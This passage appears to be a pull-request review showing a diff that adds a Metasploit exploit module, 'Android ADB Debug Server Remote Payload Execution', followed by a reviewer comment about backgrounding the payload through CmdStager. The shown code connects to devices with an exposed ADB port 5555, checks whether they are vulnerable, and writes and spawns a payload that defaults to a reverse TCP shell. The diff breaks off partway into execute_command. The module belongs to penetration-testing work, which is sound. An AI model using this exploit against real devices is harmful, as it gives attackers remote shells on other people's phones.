modules/exploits/android/adb/adb_server_exec.rb

```diff
@@ -0,0 +1,78 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/proto/adb'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Android ADB Debug Server Remote Payload Execution',
+      'Description'    => %q{
+        Writes and spawns a native payload on an android device that is listening
+        for adb debug messages.
+      },
+      'Author'         => ['joev'],
+      'License'        => MSF_LICENSE,
+      'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/shell_reverse_tcp' },
+      'Platform'       => 'linux',
+      'Arch'           => ARCH_ALL,
+      'Targets'        => [ ['Automatic', {}] ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jan 01 2016'
+    ))
+
+    register_options([
+      Opt::RPORT(5555),
+      OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/'])
+    ], self.class)
+  end
+
+  def check
+    setup_adb_connection do
+      device_info = @adb_client.connect.data
+      print_good "Detected device:\n#{device_info}"
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def execute_command(cmd, opts)
+    response = @adb_client.exec_cmd(cmd)
```

Comment:
Thanks, I initially had it background with `&` in the shell command, but I switched to the CmdStager and it doesn't look like it supports this option. I think adding a :background switch to the stager that shoves in the `&` should fix the issue.